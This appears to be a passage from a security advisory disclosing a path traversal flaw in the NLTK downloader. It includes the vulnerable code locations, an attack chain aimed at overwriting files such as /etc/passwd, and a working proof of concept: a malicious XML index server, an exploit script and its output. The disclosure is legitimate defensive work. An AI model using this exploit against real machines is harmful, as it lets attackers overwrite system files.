+ "details": "## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n ↓\n2. Provides malicious XML: <package id=\"passwd\" subdir=\"../../etc\" .../>\n ↓\n3. Victim executes: downloader.download('passwd')\n ↓\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n ↓\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n ↓\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n ↓\n7. open(filepath, \"wb\") writes file to /etc/passwd.zip\n ↓\n8. 
System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"<?xml version=\"1.0\"?>\n<nltk_data>\n <packages>\n <package id=\"test_file\" subdir=\"../../../../../../../../../tmp\" \n url=\"http://127.0.0.1:8888/test.zip\" \n size=\"100\" unzipped_size=\"100\" unzip=\"0\"/>\n </packages>\n</nltk_data>\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/malicious_index.xml':\n self.send_response(200)\n self.send_header('Content-type', 'application/xml')\n self.end_headers()\n with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:\n self.wfile.write(f.read())\n elif self.path == '/test.zip':\n self.send_response(200)\n self.send_header('Content-type', 'application/zip')\n self.end_headers()\n with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:\n 
self.wfile.write(f.read())\n else:\n self.send_response(404)\n self.end_headers()\n \n def log_message(self, format, *args):\n pass\n\n# Start server\nif __name__ == \"__main__\":\n port = 8888\n server = HTTPServer((\"0.0.0.0\", port), Handler)\n print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n print(\"Press Ctrl+C to stop\")\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n print(f\"Download directory: {download_dir}\")\n \n # Exploit vulnerability\n from nltk.downloader import Downloader\n downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n downloader.download(\"test_file\", quiet=True)\n \n # Check results\n expected_path = \"/tmp/test_file.zip\"\n if os.path.exists(expected_path):\n print(f\"\\n✗ Exploit successful! File written to: {expected_path}\")\n print(f\"✗ Path traversal attack successful!\")\n else:\n print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n exploit()\n```\n\n### Execution Results\n\n```\n✗ Exploit successful! File written to: /tmp/test_file.zip\n✗ Path traversal attack successful!\n```",